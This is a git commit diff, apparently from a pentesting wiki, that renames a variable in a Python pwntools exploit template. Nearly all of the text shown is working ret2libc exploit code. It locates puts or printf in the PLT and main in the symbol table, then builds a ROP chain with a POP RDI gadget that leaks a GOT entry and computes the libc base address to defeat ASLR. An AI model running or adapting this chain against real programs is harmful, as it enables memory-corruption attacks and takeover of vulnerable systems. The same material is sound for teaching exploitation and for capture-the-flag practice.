
GitBook: [master] one page modified

This commit is contained in:
CPol 2021-03-22 11:18:24 +00:00 committed by gitbook-bot
parent 307eb099ba
commit bceb2bdadc
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF


@ -62,10 +62,10 @@ if OFFSET == b"":
#### Find Gadgets ### #### Find Gadgets ###
##################### #####################
try: try:
print_func = "puts" libc_func = "puts"
PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
except: except:
print_func = "printf" libc_func = "printf"
PUTS_PLT = ELF_LOADED.plt['printf'] PUTS_PLT = ELF_LOADED.plt['printf']
MAIN_PLT = ELF_LOADED.symbols['main'] MAIN_PLT = ELF_LOADED.symbols['main']
@ -97,9 +97,9 @@ def generate_payload_aligned(rop):
return payload1 return payload1
def get_addr(print_func): def get_addr(libc_func):
FUNC_GOT = ELF_LOADED.got[print_func] FUNC_GOT = ELF_LOADED.got[libc_func]
log.info(print_func + " GOT @ " + hex(FUNC_GOT)) log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
# Create rop chain # Create rop chain
rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
rop1 = generate_payload_aligned(rop1) rop1 = generate_payload_aligned(rop1)
@ -117,11 +117,11 @@ def get_addr(print_func):
# Parse leaked address # Parse leaked address
log.info(f"Len rop1: {len(rop1)}") log.info(f"Len rop1: {len(rop1)}")
leak = u64(recieved.ljust(8, b"\x00")) leak = u64(recieved.ljust(8, b"\x00"))
log.info(f"Leaked LIBC address, {print_func}: {hex(leak)}") log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}")
# Set lib base address # Set lib base address
if LIBC: if LIBC:
LIBC.address = leak - LIBC.symbols[print_func] #Save LIBC base LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
log.info("LIBC base @ %s" % hex(LIBC.address)) log.info("LIBC base @ %s" % hex(LIBC.address))
# If not LIBC yet, stop here # If not LIBC yet, stop here
@ -131,7 +131,7 @@ def get_addr(print_func):
return hex(leak) return hex(leak)
get_addr(print_func) #Search for puts address in memmory to obtains LIBC base get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base